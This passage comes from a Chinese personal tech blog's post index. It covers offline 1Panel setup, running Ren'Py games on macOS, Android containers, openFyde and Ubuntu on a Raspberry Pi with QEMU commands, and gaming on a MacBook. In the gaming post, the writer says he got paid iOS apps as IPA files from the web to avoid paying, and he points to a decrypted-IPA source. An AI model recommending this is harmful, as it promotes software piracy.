Nginx（openresty）和MySQL这样安装都没啥问题，但是PHP出现了点问题，因为1Panel的PHP会在线下载扩展来构建镜像的，不是直接使用镜像创建的容器，所以安装会报错。不过既然能看到数据库，我发现有个runtimes表记录了PHP的状态，那么我把状态改成normal就可以了吧，试了一下还真行，改完上传然后重新导入容器，PHP也正常了。另外需要注意的是从互联网端导出的镜像名字和版本必须和离线端一样，不然可能识别不到，至于扩展啥的在互联网端选择好就可以了，离线端不需要修改。   所有操作完成之后试了试创建网站以及和PHP的连接之类的都可以正常使用了，就可以在内网环境下完全发挥1Panel的能力了。感想无论是Docker还是1Panel，能这么简单的在离线环境下安装我想可能是因为它是Go写的程序吧，能无依赖，静态编译的程序在没网的情况下还是方便啊……另外就是Docker果然也是离线使用的利器，想安什么在互联网准备好直接拿到离线端就能用，真是方便啊。" },{ "title": "如何在macOS上玩基于Ren'Py的视觉小说", "category": "", "tags": "Apple, macOS, 视觉小说", "url": "/2024/01/20/renpy.html", "date": "2024/01/20", "content": "跨平台的游戏移植起来就是简单啊起因最近我在玩Winged Cloud出的视觉小说，他们家出的视觉小说画风都很不错，比很多其他同行画的好看，另外长度一般都很短，大概1-2个小时就能看完，很适合下班之后闲了看一部，不过我现在已经换了MacBook，要怎么玩呢？他们家的视觉小说基本上都是用的Ren’Py引擎开发的。Ren’Py引擎的游戏本身其实原生就是跨平台的，但是也许是因为我是直接从互联网上下载的，macOS会有些验证之类的？直接运行.app结尾的文件是没办法打开游戏的，双击会显示应用程序无法打开……那该怎么运行呢？玩法研究使用iOS版的RenPyViewer不过看看之前我在MacOS上玩游戏的经验，对于Apple芯片的Mac来说，可以下载RenPyViewer来玩。只是经过我的测试发现，RenPyViewer能玩的游戏很有限，因为它内置的Ren’Py引擎版本是7.5.3的，如果游戏用的Ren’Py引擎和这个版本相差不大，或者没有用到新版的特性之类的倒是能正常运行，我试了一下Sakura MMO系列、Sakura Gamer系列等都能正常运行，但只要运行游戏Ren’Py的版本过高或者过低的游戏都会报错，尤其像新出的基本上都是8.0以上的版本了，Python的版本也从2换成3了，显然用RenPyViewer肯定是没法运行的。使用Intel macOS版的RenPyViewer其实在我发现iOS版的RenpyViewer不能运行一部分Ren’Py游戏之后，我又去搜了一下，在知乎上找到了iOS版的RenPyViewer作者发的文章，介绍了macOS如何游玩Ren’Py引擎游戏，其中包含了他为macOS做的RenPyViewer，不过我下载看了一下是Intel版的……不过也许这个里面用的引擎更新一点，一部分iOS版不能玩的这个版本就可以玩。使用终端运行但毕竟前面两个方法内置的引擎版本是固定的，能玩的游戏也很少，看来得想个通用的办法，毕竟Ren’Py游戏在发行的时候是支持macOS的啊。所以我又看了看，Ren’Py开发的游戏发行之后一般在游戏文件夹里有一个.sh的文件，看起来应该是给Linux系统运行使用的，但是macOS也可以运行.sh的文件啊，所以我就直接在终端运行了它，结果macOS和Linux不一样的地方是所有从网上下载的可执行文件都必须签名，不然就会报移到废纸篓之类的错，关于这个问题，我看网上说的好像是执行xattr -r -d com.apple.quarantine <path>就可以，不过后来我也忘了是出什么问题，最后是手动一个一个给每个可执行文件加的权限，最终倒是也运行起来了。手动修改.app文件不过每次运行要是用终端那不是很麻烦嘛，另外既然游戏里面明明有.app的文件，为什么会运行不了呢？后来我看了看，发现Contents/MacOS文件夹下的文件并没有可执行权限，我猜可能是和这个有关系？加了可执行权限之后倒是没有报应用程序无法打开的错了，但是还是不能运行，点开之后在Dock栏跳了几下就消失了……然后我就去看了下那个可执行文件，发现就是一个Shell脚本（后面的版本换成可执行文件了）里面定义了几个ROOT变量，一个是和脚本同级的目录，一个是和.app同级的目录，还有一个是Contents/Resources/autorun目录，这么看来正常情况下因为游戏是跨平台的，游戏肯定不会在.app里面，在外面的话……看现在macOS权限管的这么严格，让它读取.app外面的文件估计不太行，肯定只能读取.app里面的文件，至于Intel macOS版的RenPyViewer我看了一下好像原理差不多，是把游戏目录用软链接映射过去的，所以才能在不直接获取.app外面的文件下运行。之后我又参考了一下其他直接在macOS发行的Ren’Py游戏，感觉也差不多。所以解决方法也很简单，要么把游戏文件放到Contents/Resources/autorun目录下，要么做个软链接放过去，我觉得单个.app管理起来会方便一些，所以就直接把游戏文件全部移动进去了。试了一下，总算可以正常运行了。而且多试了几个，基本上都没有问题。   但有些Ren’Py游戏连.app都没提供，我不知道SDK默认生成分发版的时候会不会包含macOS上用的.app文件，不过也有可能是发行的时候只针对Windows所以删掉了，对于一些非官方汉化版很有可能是汉化的人给删掉了。对于这种情况，可以先搞清楚这个游戏使用的Ren’Py版本，然后去Ren’Py官网下载对应版本的SDK，把SDK中的renpy.app复制出来，然后按照上面的方法把游戏拷进去就可以正常运行了。   另外macOS上还有一些坑，比如说Windows的文件名是不区分大小写的，但是macOS是区分的，有时候他们写脚本的时候文件名和程序里可能有些比如CG之类的大小写不一致，结果图片不能正常加载，这种情况就只能用unrpa解包然后把对应的图片名改成正确的才能运行了，当然Ren’Py提供了忽略错误的功能，但是不知道为什么只有英文模式下有，中文下就没有……这种情况还得先切换到英文才行。总结总的来看，以后如果想在macOS上玩Ren’Py游戏，优先应该用游戏自带的.app最好，把Contents/MacOS下的文件添加可执行权限，然后把文件全部移动到Contents/Resources/autorun下。不过旧版的Ren’Py基本上都是只有x86_64的可执行文件，新的才有两种都支持的，如果是用的Apple芯片的Mac，最好先看看可执行文件是不是通用的，如果不是优先应该先试试iOS版的RenPyViewer，毕竟原生运行肯定要更省电一些，如果不能运行再用上面的办法。" },{ "title": "年终总结", "category": "", "tags": "总结", "url": "/2024/01/01/summary.html", "date": "2024/01/01", "content": "接下来，就是长跑的时间了……2023年过的怎么样？至少今年我顺利毕业了，而且也有一份还可以的工作能让我赚点钱，比年初的预期已经好了很多，从总体上来看还算不错吧，另外还有一个很重要的原因就是我早晨抽卡抽到UP角色了😂，所以状态还可以。   不过从我写博客的次数可以看出来，今年我探索新事物的动力也不怎么高了，其实吧我的工作也不怎么忙，算是965的程度，平时也没什么加班之类的，但我每次回到住所之后就只会躺在床上看看视频和打游戏（视觉小说）而已，而且经常就玩到很晚，导致我晚上睡觉的时间还很短，可能也就6个小时多。也就是说我平时我晚上玩的时间可能就要7个小时多了。另外这对我的影响还是挺大的，最近我在玩osu!mania，前段时间我打的水平应该算越来越好吧，但是最近脑子不太好使了，打的效果越来越差了，还有最近幻视（看错字）的情况比之前发生的概率高了不少，还挺令我头疼的……   不过这可能和我未来的打算差不多，我本来就想在赚够我一个人一辈子花的钱之后就不再继续工作了，不过要是到那个时候我还是像现在这样黑白颠倒，不能好好吃饭的话可能一辈子也花不完我赚的那些钱🤣。   不过总的来说可能就是因为我没啥照顾自己的能力吧，所以说明明是挺不错的环境但是过的就像那些997的人一样🥲……像这种问题还是应该考虑解决一下才行。   至于在2023年发生的事情倒是还挺多的，令人印象最深刻的大概就是AI了吧，自从ChatGPT出了之后各行各业都开始搞LLM了，而且正是因为LLaMA这种东西的出现，国内的AI才会五花八门吧，只是LLM对我的影响可能还是不太大，后来发现大多数问题我自己就能解决，我解决不了的问题问它也没法解决，而且需要我写文案的时候很少，大多数情况并不需要生成一堆废话。未来的打算就和上面提的一样，我的目标就是赚够我一个人一辈子花的钱，所以接下来的日子很可能会是一成不变的，工作日上班，下班了玩电脑，休息日睡觉，节假日回家了🤣，而且未来的10年里很可能都是这样，没有更多的计划了。   但是看环境我猜应该会比往常有更多不可预料的情况吧，最近在这个世界上各种各样的事情越来越多了，我想接下来的一年里可能会有更多情况发生，说不定就是世界末日呢😆，至于会不会影响到我可能也只能到时候才知道了吧，不过对我来说最好还是别发生对普通人影响特别大的事情，比如手头的钱全变成废纸啥的，如果真出现那种情况，最好能提前发现然后全部转成黄金或者USDT之类的最好吧，如果没有这样做的话……反正大家的起点可能就差不多了吧，不知道到时候会发生什么样的事情。总结总的来说，过去一年里倒是没那么差，至于未来会更差还是更好也很难说，至于过去的一年里到底发生了什么我也记不太清了，现在的我只能说一些没什么营养的废话填充这篇文章了🤣。" },{ "title": "如何在Linux容器内运行Android？", "category": "", "tags": "Linux, Android", "url": "/2023/12/24/android.html", "date": "2023/12/24", "content": "原生运行Android肯定比虚拟机好！起因前段时间我在树莓派上安装了openFyde，后来发现原来它的ArcHero安卓子系统是基于anbox开发的，和ChromeOS的安卓子系统有一些区别，至于区别在哪我也不是特别清楚。不过既然它的安卓子系统和Linux直接安装的没啥区别，那不如我试试看在普通的Linux上安装容器化的安卓系统效果怎么样？试用Waydroid最开始我测试的是Waydroid，因为听说anbox的升级版就是Waydroid，据说性能比anbox强，所以想试试看，安装挺简单的，执行个脚本之后用apt就能安装。不过我的测试平台是Ubuntu Server 20.04LTS，Waydroid之所以叫这个名字是因为它要基于Wayland显示服务器运行，可我是无界面的系统要怎么用它啊？Waydroid好像没有无头模式这种东西，不过我搜了一下weston实现了Wayland协议而且支持无头模式，用法也很简单，安装好weston之后执行weston --backend=headless-backend.so就可以了。   不过默认安装好的Waydroid不能运行ARM架构的程序，似乎是因为libhoudini之类的库是有版权的，所以不能直接集成，不过还好有人开发了一个工具包，可以给Waydroid安装包括libhoudini在内的多个因为版权等原因不能直接在项目里使用的程序，而且操作起来也很简单，体验还不错。   至于怎么查看界面，因为是无头模式启动的所以没有界面，只能通过adb查看，不过我试了一下scrcpy不知道为什么不能用，但是用Airtest就能看到界面，就挺奇怪的……还有就是分辨率很低，不过这个应该改weston的启动参数就可以改分辨率了吧，但因为后来发现Waydroid不能开多个实例感觉有点废物就没有在继续研究了。   不过总的来看，如果是在桌面版的Linux上，而且界面是使用Wayland协议的效果应该会比较好，好像Ubuntu22.04以上的系统默认会使用Wayland，在这个系统上面使用Waydroid效果应该比在Windows上使用WSA的效果还要好。毕竟这可不是虚拟机运行，而是使用容器技术原生运行的，如果有机会的话还是值得一用的。试用redroid因为Waydroid不能开多个实例，所以我搜了一下有没有类似技术而且能开多个实例的，结果就找到了redroid。安装也很简单，执行几个命令修改下内核模块然后直接用docker pull个镜像就可以用，而且这个切换版本比Waydroid简单，Waydroid想换别的安卓版本要自己整镜像，不然就只能用基于Android 11的LineageOS，redroid可以按镜像的版本号选择希望使用的安卓版本，而且我测试了一下，redroid是可以使用scrcpy连接的，看起来效果还不错。   但是我试了一下运行一些ARM的安卓程序会出现闪退的情况，我以为是因为没有ARM兼容库的问题，但是文档上写的镜像里面已经自带了libndk……这么看来可能是因为libndk的兼容性不太行啊，另外libndk好像是给AMD的CPU使用的，我用的CPU是Intel的，Intel应该用libhoudini才对，然而我找了半天也没有找到怎么让redroid使用libhoudini……真是令人失望啊。总结看来在容器内运行Android系统的需求还是太少了，很多问题都没人解决……不过想想也是，那些搞云手机的大多直接拿真机运行Android，用兼容层的性能损耗也很大，而服务器级别的ARM芯片也不便宜……   另外就是使用Linux的人也很少，而且像那些在Windows上玩安卓游戏的人都是用的虚拟机，性能也都够用了，毕竟那么高功率的桌面端CPU怎么样都比超低功率的手机CPU强啊，所以容器内运行Android的需求比较少可能也很正常吧……" },{ "title": "rpi4-openfyde的使用体验", "category": "", "tags": "树莓派, openfyde", "url": "/2023/12/10/openfyde.html", "date": "2023/12/10", "content": "什么样的系统用户体验更好呢？起因最近玩树莓派感觉有点玩腻了，毕竟我不是搞硬件的人，树莓派的GPIO接口对我来说毫无意义，当作PC或者服务器的话性能又太差了，兼容性也不太行（这么看来新出的树莓派5一样对我来说毫无意义，和4B一样都是垃圾）。但是毕竟那个东西也挺贵的，闲置也不太好，因此我想在上面装上适合普通人使用的系统，然后送给家里的人使用。系统的选择首先服务器版的系统肯定不需要考虑了，谁会用一个满是命令行的系统啊，在我看来普通人使用的系统只能在Windows, MacOS, Android, ChromeOS里面选了，任何GNU/Linux发行版的桌面版在我看来都不太适合普通人使用，Windows之前已经试过了，可以说基本上没法用，就是纯粹的垃圾。MacOS显然还没有什么方案可以安装（至于仿MacOS的TwisterOS对于普通人来说使用难度也很大，安装软件都是难事），Android虽然也不是不能用但是作为桌面端系统效果还是不太行，所以我觉得可能也就只有ChromeOS可以考虑一用了。   不过官方的ChromeOS要支持的设备才能刷，树莓派显然不在其中，要么就刷ChromiumOS，但是那个要登谷歌账号，在国内使用也不太好。幸好国内有一家对ChromeOS做了本地化的公司，开发了FydeOS，我看了一下如果想在树莓派上安装，就只能安装FydeOS for You，但那个是收费的，每年要120CNY，太贵了，我肯定是不会考虑的。还好，还有一个替代品，那就是openFyde，两个系统我也不太清楚有什么区别，可能是云服务有所不同吧？对于树莓派来说，安装rpi4-openfyde就可以了，另外想要安装的话最好选文件名中包含“archero”的那个，才能使用Android子系统。安装与使用体验第一次安装的时候我是直接把镜像用Raspberry Pi Imager刷进去的，我以为它和其他的树莓派系统一样刷进去之后再配置其他东西，结果并不是，那个镜像是个安装包，想要用的话需要先格式化TF卡，然后找一个U盘把系统刷进去，然后把U盘和TF卡都插入树莓派才能安装，就和安装ESXi一样。   安装之后拔掉U盘重启就可以创建用户使用了，首先作为浏览器为基础的系统，我平时用浏览器可能也就是看看Bilibili吧，之前我使用树莓派官方系统的浏览器看Bilibili效果非常差，看看装了openFyde的效果怎么样？结果令人失望，效果还是一样的差，主要应该还是没有硬件解码的问题吧……树莓派4B的GPU好像只支持硬件解码H264，而树莓派5更是卧龙凤雏，只支持H265，真是有够逆天。这么说来FydeOS for You可是要每年120CNY呢，这个水平的性能他们有自己测过吗？就这样也能收费吗？至于其他不涉及视频的网页倒是还算流畅，不过毕竟GPU很垃圾，有一些特殊情况还是会卡。   除了浏览器之外，可能用的比较多的就是Android子系统了吧，要是想轻度办公的话应该需要一个Office，用浏览器的Office也不太好，所以先安装个WPS Office试试看，这个从Fyde的应用商店里就能直接安装，还挺方便的。不过安装好之后效果感觉不太行，首先这个Android子系统居然不支持滚轮，复制粘贴都要像手机那样长按，而且很多时候比如新建文档，它会开两个窗口，原来新建文档的窗口不会关掉……这可不像是能让人用的样子啊……而且整体使用也比浏览器卡，使用起来并不顺畅。另外输入法也不是默认开启的，要在设置里设置，体验也不太行。   我试了一下那个应用商店，上面的应用要么就是网页链接，要么就是Android程序，要么就是浏览器插件，Android程序从我用了WPS Office来看不怎么抱有希望了，放网页链接的我感觉有点无语😓，其他系统的浏览器都能把网页当作应用，这个系统反倒是直接当超链接跳过去了……至于浏览器插件，那个只要是能安装浏览器就都能用吧，没啥特别的。   虽然普通人可能用不上，这个系统还有一个Linux子系统，具体是什么Linux我没细看，不过好像是使用容器启动的。我试了一下效果还行，只是不知道为什么不能使用全部内存，我使用的是8GiB的树莓派，但是分配给Linux的只有6GiB，存储也是分配的，默认10GiB。明明都是Linux系统为什么ChromeOS要限制子系统的资源呢？总结总的用下来，树莓派4B的性能可能真的就只能看看网页了，连视频都不能流畅播放，安装Android应用效果也很差，不过有时候限制多并不是一件坏事，毕竟对普通人来说如果这个性能让人不要抱有更多的希望，反倒是提高了用户体验呢。虽然如果是用比如Ubuntu之类的系统能做的事情应该更多，但很多情况不是普通人应该关心的事情，尤其这个芯片还是ARM指令集的，即使某些应用提供了Linux版也不一定能在树莓派上安装，尤其这个安装很多时候也不是双击就能搞定的，openFyde至少能做到真想安装Android应用的时候双击还是能安装的，卡虽卡了点，但是一般情况不会出现让普通人看了会看不懂的情况，已经算很不错了。   因此，我觉得如果让普通人使用树莓派，安装openFyde是最好的选择了。" },{ "title": "在MacBook玩游戏的各种方法", "category": "", "tags": "Apple, MacBook, 游戏", "url": "/2023/10/21/game.html", "date": "2023/10/21", "content": "我倒要看看是谁在说Mac打游戏是疯子😡起因自从用了MacBook Pro以后，我用我以前Windows笔记本的次数越来越少了。虽然性能可能比不上，但是安静和超长续航的体验还是相当不错的。但是我也不是完全不玩游戏的人，有时候闲了也有打游戏的需求，那我如何在不使用Windows系统的情况下打游戏呢？在MacBook玩游戏的方法原生游戏一般来说如果想发挥MacBook的全部能力，那自然是完完全全为Mac设计，不需要任何转换等方法的游戏最好了，这类游戏一般在Mac App Store就能找到和下载，只是绝大多数都不是免费的，我也就下过一款TouchBrickOut的打砖块游戏，这是真真正正为Mac设计的，不仅原生还要Touch Bar。当然对于大多数游戏来说不会为Mac专门设计，毕竟Mac的游戏玩家比较少。但是能在Mac上原生运行的游戏除了为Mac设计以外，就是开源游戏了。毕竟源代码都有了，想在哪里编译都可以。对于我玩的游戏来说，有几款正好符合这一点，比如osu!lazer，还有之前玩过的三维弹球。iOS游戏因为M系列芯片基于ARM架构，所以我的MacBook也可以玩iOS的游戏。这类游戏一般也能直接在Mac App Store上下载到，比如我玩过的药水制作师。但其实有很多iOS游戏在Mac App Store上都搜索不到，应该是开发者设置了规则不允许在Mac上使用。对于这类游戏可以在Decrypt IPA Store上下载，并且使用PlayCover安装。对我来说，我一般玩公主连结Re:Dive，以及一些模拟器，比如XP3Player和ONSPlayer（其实这两款软件可以在Mac App Store上下载，但是都要花钱……所以我就去网上找的ipa文件然后在PlayCover上安装了）使用Rosetta 2的x86游戏在M系列芯片出来以前，其实也有不少Mac上的游戏，但是这类游戏可能在M芯片的Mac出来之前就已经开发好了，想让开发者为M芯片做适配显然不大可能。不过macOS有Rosetta 2可以让开发者不需要任何改动的情况下就让游戏在M系列芯片Mac上运行。这类游戏非常多，基本上在Steam和Epic Games上下载的游戏都是x86的，像我用的Epic Games Launcher以及在上面下载的游戏while True:learn()都是这样的，不过我玩的这些对性能要求都非常低，所以即使用了转译，但是玩起来并不会卡。基于脚本的Galgame游戏很多Galgame都是用一些专用的脚本引擎工具写出来的，例如T Visual Presenter、NScripter还有Ren’Py等等，因为是脚本，所以通常来说很容易跨平台，毕竟它们没有太多依赖系统本身的东西，只要能写出对应平台的解析器，脚本都能运行。像上述提到的XP3Player、ONSPlayer还有RenPyViewer就可以运行很多基于脚本的游戏。不过很多Ren’Py游戏都有发行macOS版本，所以一般不需要安装RenPyViewer。只是有可能它们都是基于x86开发的，可能需要用Rosetta 2转译……在网页上运行的游戏浏览器作为跨平台最强的解决方法，自然游戏也不例外，能在网页上运行的游戏也很多，像RPG Maker MV制作的游戏基本上都可以在浏览器上运行。我看到有一个网站就收集了很多这种游戏，他们之前还把游戏放在了GitHub上。不过Github对Sexually Obscene Content内容是不容忍的，所以他们在GitHub上的东西就消失了……不过我搜了一下还有一些漏网之鱼，这个账号还有这样的游戏可以玩🤣（有效性只限我写文章之前的时间，说不定哪天被GitHub发现就没了）。其实对于这种网页上可以运行的游戏来说，最好下载下来，虽然RPG Maker MV的游戏可以在线玩，但是加载那么多资源，尤其这些文件还是在境外，对国内玩家非常的不友好😆，所以如果想在Mac上玩，可以下载下来，然后在终端那个目录下执行python3 -m http.server，就可以打开 http://127.0.0.1:8000 下开始游戏了。不过Safari的效果不太行，很多游戏连声音都没有，想玩还是下载Chrome之类的浏览器比较好。使用Wine🍷游玩Windows游戏除了相对比较原生的办法，不太优雅的办法就是用基于Wine的各种东西了。其实我之前不太想在MacBook上使用Wine的，因为一般如果是Linux系统在ARM芯片上运行的话需要用QEMU User模式模拟x86，然后再运行Wine，效率极其低下，还不如用虚拟机呢（虽然听过Crossover，不过我当时以为它是按这种方式的，而且还要收费😂）。不过macOS不太一样，它有Rosetta 2加持，效率比QEMU User模式高太多了，虽然是两次翻译但是毕竟有黑科技还算是能玩。尤其是前段时间出的Game Porting Toolkit，据说很厉害，所以前几天我根据这个教程安装了一个，编译的时候第一次听到我的MacBook风扇转😂。试了试效果确实不错，找了个Unity3D的游戏可以满帧率运行。虽然很不错，不过我又去网上搜了搜，发现我是**，有个开源的软件Whisky不需要编译任何东西，就可以使用Wine和GPTk，而且配置也很简单，还能使用DXVK，而且因为是已经编译好的，不需要安装依赖，也不需要源码之类的东西，我通过上面教程安装的大小要4个多GiB，但是这个就只要1个多GiB，还不需要考虑乱七八糟的东西。   经过我的实测，GPTk（其实就是D3DMetal）兼容性更好一些，效率也更高，但是占内存很大，DXVK似乎效率低一些，但是占内存比较小，因为我的MacBook只有8GiB内存，而且我玩的游戏在哪个上面都能跑满帧率 （反正3A大作我也不可能在MacBook上玩，估计M2的水平也玩不了……不如说我基本上不玩3A大作🤣） ，所以我在玩游戏一般还是会用DXVK多一些，除非打不开才会用D3DMetal。使用虚拟机游玩Windows游戏因为我的MacBook只有8GiB内存，而且硬盘也只有256GiB，跑虚拟机压力实在是太大了，我以前试过UTM，但是玩不了游戏，随便什么游戏都会卡的动不了，当然也可能是UTM的显卡驱动不太行，不过现在的话我也不想尝试其他虚拟机了，所以我只能说强烈不推荐使用虚拟机玩游戏。云游戏方案这种方案直接就不在本机运行了，流畅程度全看网络和连接的主机性能。我以前也写过一篇关于云游戏的体验，在这里就不多赘述了。感想这么看来MacBook玩游戏的方法挺多的嘛，谁说一定要Windows才能打游戏呢？我觉得说在macOS上打游戏的人是精神病的人自己才是精神病吧，谁也没有说买MacBook就是专门拿来打游戏的，那些人就是觉得买Mac亏，估计还很穷吧🤣。   顺便一说，有个叫AppleGamingWiki的网站上记录了一些比较大的游戏在M系列芯片上的兼容性，如果真的有想在Mac上打游戏的想法，也可以去这个Wiki上参考一下。" },{ "title": "在树莓派4B上安装Ubuntu以及各种操作", "category": "", "tags": "树莓派, Ubuntu", "url": "/2023/09/24/rpi-ubuntu.html", "date": "2023/09/24", "content": "明明在普通的电脑上也能完成这些操作……😥起因自从上次我给我的树莓派4B-8GiB内存版安装了Windows11以后，我感觉这个东西上是真的鸡肋，速度慢而且兼容性还差，指令集有缺失连很多需要用到加密库的软件都不能正常运行……后来我就重装了一个ESXi-Arm Fling，但是装这个也有个问题，就是它不能使用TF卡存储东西，我还特地为了Windows买了个64GiB的TF卡，结果装虚拟机还用不了😂，U盘我也只有一个32GiB的，ESXi-Arm Fling如果想要正常的存储配置信息就至少需要占用掉3*4GiB的空间，这样虚拟机就只能使用20GiB的空间……真的全都是垃圾，20GiB能开几个虚拟机啊，开了也没啥能用的。所以这个树莓派就一直在吃灰。   后来我又想整点活，想着干脆安装个Ubuntu好了，反正放着也是吃灰，也错过了最佳卖树莓派的机会，就用起来吧，安装Ubuntu的时候居然也是各种碰壁😓，一开始我用树莓派镜像烧录器，闭着眼睛直接选了Ubuntu Server系统，我还以为它可以像安装树莓派系统那样第一次启动的时候让我设置密码，结果烧录完之后引导就直接让登录了，我连密码都不知道要怎么登录啊😥，网上搜了一下有默认密码，输进去之后显示需要让我更改密码，结果这个需要更改的密码怎么设置都不能生效😰，后来去Ubuntu官网看了一眼才知道原来需要在烧录中选择高级设置，手动设置密码才行……网上这些教程都是垃圾，这个软件也一样🤬，啥提示都没有，不看文档就只能靠猜了😢。   最后终于把Ubuntu安装好了，可以开始整活了😁。用树莓派整点什么整点FM电台安装好Ubuntu后我最先想干的事情还是整FM电台，毕竟这真的就是树莓派唯一和其他设备不一样的地方了啊，于是我就编译了一下PiFmAdv并运行，结果不知道为什么一运行树莓派就直接死机……于是我退而求其次，选择了fm_transmitter，这个倒是能运行，不过操作和树莓派3B区别相当大，首先编译得要用make GPIO21=1，然后杜邦线也要插到第40个接口，具体如下图打x的位置：,--------------------------------.| ooooooooooooooooooox J8   +======| 1ooooooooooooooooooo  PoE |   Net|  Wi                    1o +======|  Fi  Pi Model 4B  V1.4 oo      ||        ,----. +---+         +====| |D|    |SoC | |RAM|         |USB3| |S|    |    | |   |         +====| |I|    `----' +---+            ||                   |C|       +====|                   |S|       |USB2| pwr   |hd|   |hd| |I||A|    +====`-| |---|m0|---|m1|----|V|-------'CPU和GPU也全部需要定频运行，另外设置频率不能超过93 MHz……我调了半天才能正常运行……还有就是不像之前PiFmAdv那个项目可以使用立体声，感觉树莓派4B还不如3B……   不过我写着写着感觉好像不太对劲，看了一眼我上次写电台的那篇文章的时间比PiFmAdv最后一次更新还要早，看了一眼提交发现人家已经把问题解决了，难怪我运行不起来，原来是代码没用最新的🤣，刚刚更新了一下代码之后再运行已经没有任何问题了，立体声啥的都能正常使用了。不过Makefile还是没改……aarch64的系统运行依然会出问题😥……其实改起来也很简单，把Makefile里面的两个参数换成：\tCFLAGS = $(STD_CFLAGS) -march=armv8-a -ffast-math -DRASPI=4\tTARGET = pi4就可以正常编译了。整点大语言模型LLaMA因为我的树莓派有8GiB内存，之前我在我的8GiB内存的MacBook Pro上跑LLaMA都没问题，那在树莓派上跑个LLaMA应该也没问题，所以就想试试看。跑起来非常简单，把llama.cpp拉下来，然后直接编译就行了，但是实际跑起来速度非常慢，大概1token要1-2秒……根本用不成，不过现在的llama.cpp已经非常完善了，支持各种各样的硬件加速，无论是在我的MacBook上，还是用N卡、A卡，甚至手机使用OpenCL似乎都可以进行硬件加速。这些都能得到很不错的速度，那树莓派呢？树莓派用的好像是博通的叫什么VideoCore的显卡，我搜了一下，貌似没有办法使用OpenCL……不过搜的过程中发现似乎可以装Vulkan，虽然llama.cpp不能使用Vulkan，不过ncnn框架似乎可以使用Vulkan，跑个waifu2x也算不浪费这个树莓派的GPU啊，只是安了半天发现不连接屏幕貌似安了也识别不了……所以还是算了吧……整点QEMU-KVM Windows虚拟机当时我在树莓派上安装Windows11的时候听说在虚拟机上运行的效果要比裸机安装效果更好，我听到之后认为这是胡说八道，哪有虚拟机比裸机运行效果好的啊，不过树莓派嘛……说不定会有因为驱动不完整之类的情况，毕竟如果是在虚拟机里安装系统外面的Linux系统可以使用无线网卡，而直接安装Windows是不能使用无线网卡的，所以这次我也打算试试看，反正树莓派上使用虚拟机是可以使用KVM加速的，所以试试也没关系。   安装QEMU也很简单，直接执行：sudo apt install qemu-kvm libvirt-daemon-system libvirt-clients bridge-utils virtinst virt-manager qemu-system-arm qemu-efi-aarch64 seabios vgabios就可以了，安装系统的话也很简单，首先去下载Windows所需要的驱动virtio-win，然后下载Windows ARM版的安装光盘，这个去MSDN I tell you下载就行了，之后下载一个VNC客户端用来连接虚拟机的屏幕，然后创建硬盘：qemu-img create -f vhdx -o subformat=fixed system.vhdx 30G准备好这些以后就可以启动虚拟机了，启动的命令如下：sudo qemu-system-aarch64 -M virt-2.12 -smp 4 -m 4G -cpu host -enable-kvm -bios /usr/share/qemu-efi-aarch64/QEMU_EFI.fd -device ramfb -device qemu-xhci,id=xhci -usb -device usb-kbd -device usb-mouse -device usb-tablet -k en-us -device virtio-balloon -device virtio-rng -device virtio-blk,drive=system -drive if=none,id=system,format=raw,media=disk,file=system.vhdx -device usb-storage,drive=install -drive if=none,id=install,format=raw,media=cdrom,file=win10.iso -device usb-storage,drive=drivers -drive if=none,id=drivers,media=cdrom,file=virtio-win.iso -device virtio-net,disable-legacy=on,netdev=net0 -netdev user,id=net0,hostfwd=tcp::3389-:3389 -vnc :1 然后就能像正常安装Windows系统那样安装了，其中需要注意的一点是安装的时候会读不到硬盘，需要加载光盘中的驱动，其他缺失的驱动光盘里基本上都有，直接安装就行。另外第一次重启前最好把-device usb-storage,drive=install -drive if=none,id=install,format=raw,media=cdrom,file=win10.iso删掉，安装好之后可以打开远程桌面，就可以直接使用树莓派的IP去连接Windows系统，还能有完整的分辨率和音频支持。   既然装好了虚拟机，那么我就应该验证一下虚拟机是不是真的比物理机安装效果更好了。具体怎么验证呢？我又找了一个树莓派4B-4GiB内存版，在上面安装直接安装同版本的Windows ARM版，然后把两个树莓派的频率都调为1.8GHz，在两个Windows系统上下载了7-Zip ARM版，跑一遍基准测试，结果裸机安装的总体评分为6.1GIPS左右，虚拟机是5.1GIPS左右，这很明显裸机还是更强嘛，虚拟机唯一的优势就是可以用无线网络罢了，说到网络我也测了一下这个速度，在同样使用有线网络的情况下，虚拟机因为用的是user模式效果很差，连50Mbps都跑不到，而裸机可以超过100Mbps。至于qemu怎么使用其他网络模式我也不太会，整起来好像还挺麻烦的。总的来看树莓派安装QEMU-KVM运行Windows实在是不怎么样……一样是个垃圾。让树莓派运行x86程序既然安装了QEMU，那就该玩玩跨指令集的东西了，当然跨指令集是没办法使用KVM了，而且树莓派不像MacBook的Rosetta 2那样有硬件加速，效果肯定会非常差，不过我已经做好了觉悟，还是想整个玩玩。怎么整呢？非常简单，只要运行sudo apt install qemu-user-binfmt就好了，那到底是什么软件让我想大费周章的让树莓派运行x86程序呢？其实是一个叫做postjson的接口测试工具，似乎是拿Go写的，但是没有开源，也没有ARM64的二进制文件，所以就只好用QEMU啦，试了一下还真能运行，而且就像Rosetta 2那样直接当作原生的程序运行就可以，效果挺不错，不过CPU占用非常高，一运行一个CPU核心就占满了😂，也就是勉强能用的水平吧。感想搞了这么多东西之后发现树莓派除了那个FM电台不能在普通电脑上操作其他不是和普通的电脑一样吗🤣？那买树莓派还有什么意义，不如买个二手手机，不过有了树莓派就感觉越垃圾越想挖掘它的作用，这可能就是它存在的意义吧🤣。" },{ "title": "关于卫星通信的一些看法", "category": "", "tags": "卫星, 通信", "url": "/2023/09/06/satellite.html", "date": "2023/09/06", "content": "卫星通信也许并不困难😁起因前段时间，华为出了一款可以打卫星电话的手机——Mate 60 Pro。我虽然对华为不怎么感兴趣，对于它能把3年前的芯片卖到7K+CNY的营销水平也不感兴趣，但是对于卫星通信我还是挺感兴趣的，所以今天我就想说说我了解到的一些关于卫星通信的东西。关于卫星通信其实卫星通信在我们身边非常的常见，最常见的应该就是GNSS了，现在不仅手机可以通过卫星来导航，连各种各样的物联网设备也可以做到。不过这和卫星电话还是有点区别，因为卫星电话是双向通信，但是导航卫星是单向通信，手机通过卫星广播的位置信息以及一些信号差分等方式来计算出当前的坐标，所以连接导航卫星并不需要很长的天线，因为它不需要发射信号。   